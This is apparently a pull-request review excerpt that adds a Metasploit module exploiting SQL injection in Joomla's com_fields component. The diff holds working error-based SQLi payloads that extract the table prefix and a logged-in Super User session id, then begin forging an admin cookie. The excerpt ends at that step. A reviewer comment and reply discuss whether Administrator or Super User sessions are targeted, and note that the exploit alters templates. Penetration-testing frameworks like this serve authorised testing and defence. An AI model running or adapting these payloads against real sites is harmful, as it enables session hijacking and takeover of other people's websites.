modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb

```diff
@@ -0,0 +1,272 @@
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
+        ])
+
+  end
+
+  def check
+
+    # Request using a non-existing table
+    res = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
+
+    if res && res.body =~ /qpqjq(.*)qqqqq/
+      table_prefix = $1
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+
+  end
+
+
+  def sqli( tableprefix , option)
+
+    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
+    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
+    # This way we make sure that's excluded and we only get real admin sessions.
+    
+    if option == 'check'
+      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
+    else
+      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x717171,(SELECT MID(session_id,1,42) FROM #{tableprefix}session where userid!=0 LIMIT 1),0x7171717171),4879))"
+    end
+    # Retrieve cookies
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+        'option' => 'com_fields',
+        'view' => 'fields',
+        'layout'=> 'modal',
+        'list[fullordering]' => sql
+        }
+      })
+
+  
+    return res
+
+  end
+
+
+  def exploit
+
+    # Request using a non-existing table first, to retrieve the table prefix
+    res = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
+
+    if res && res.code == 500 && res.body =~ /qpqjq(.*)qqqqq/
+
+      table_prefix = Base64.decode64($1)
+      table_prefix.sub! '_session', ''
+      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
+    end
+
+    # Retrieve the admin session using our retrieved table prefix
+    res = sqli("#{table_prefix}_", 'exploit')
+    
+    if res && res.code == 500 && res.body =~ /qqq(.*)qqq/
+      auth_cookie_part = $1
+      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
+    end
+
+    # Retrieve cookies
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php")
+    })
+
+    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
+      cookie_begin = $1
+      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
+    end
+
+    # Modify cookie to authenticated admin
```

Comment:
as before, admin or super user?

Reply:
From the testing I've done, this should be Super User. The module can retrieve Administrator cookies as well but the exploit will fail when it attempts to mess with templates using an Administrator's cookie.